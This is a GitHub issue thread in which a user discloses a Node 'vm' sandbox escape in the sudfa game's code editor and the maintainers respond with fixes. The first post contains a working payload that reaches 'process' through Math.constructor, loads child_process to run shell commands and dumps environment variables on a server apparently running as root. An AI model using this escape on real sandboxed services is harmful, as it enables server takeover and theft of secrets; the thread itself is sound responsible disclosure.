### ISSUE TITLE
Arbitrary code execution as root

### ISSUE THREAD

**Issue by luruke** [sickDevelopers/sudfa#1]
As stated in the doc of node [`vm`](https://nodejs.org/api/vm.html):
> The vm module is not a security mechanism. Do not use it to run untrusted code.

In fact it's possible to run arbitrary code on the server via the editor:

```javascript
class Runner {

    constructor(game) {

        this.game = game;
        
        const ForeignObject = Math.constructor;
        const ForeignFunction = ForeignObject.constructor;
        const process = ForeignFunction("return process")();
        const require = process.mainModule.require;
        const cp = require('child_process');
        
        this.team = {
            name: "luruke's team", 
            troop: [
                game.Dev({
                    name: cp.execSync('uname -a').toString()
                }),
                game.Mktg({
                    name: JSON.stringify(process.env)
                }),
                game.Pm(),
                
            ]
        }
    }


    run() {

        // Your current soldier, which is acting in this turn
        const soldier = this.game.getCurrentSoldier();
        // Reference to the enemy team
        const enemyTeam = this.game.getEnemyTeam();
        // Reference to your team
        const myTeam = this.game.getMyTeam();
        
        // Simple AI
        const target = enemyTeam.getMostDamagedSoldier();
        soldier.hit(target);

    }

}

module.exports = Runner;

```

![Screen Shot 2019-07-04 at 15 08 37](https://user-images.githubusercontent.com/61326/60674166-d0a1b200-9e79-11e9-8890-882ee648173c.png)

Also it seems that the `node` process is running as `root`.

I'm not expert in `node/vm` but it seems that this project https://github.com/patriksimek/vm2 tends to solve some of the security problems in the original `vm` module.

**Comment by luruke** [comment]
And of course, I don't believe `vm2` is the solution to everything, they also have pending issues on some newer node versions: https://github.com/patriksimek/vm2/issues/187

**Comment by sickDevelopers** [comment]
Thank you very much! You're right, we didn't put enough effort on securing the underlying vm yet. As stated everyware on the internet, there is no trivial way to run user generated code on the server. But we have to keep the fights server side for many reasons. So, after a brief closed test round, we decided to go online anyway.

We have a two step path ahead:
1. Run an application container as you suggested. Vm2 is probably the right way to go.
2. Put the fight execution in a totally separated and isolated container. The backend already runs in a dockerized env, we would love to push the line even further and run the entire arena in a separate docker image. We know that someday somebody way smarter than we are will come up with somenting funny to avoid the vm, so having a controlled container to limit the attack area is the way to go

**Comment by sickDevelopers** [comment]
I'm back, with [ #256149](https://github.com/sickDevelopers/sudfa/commit/256149f6f10bcebc6fd8e7b758b3c5abb02a3896?diff=unified) we completed what we had in mind last time, splitting the execution of the arena from the backend api server and "securing" the env with vm2. 

Thank you again!
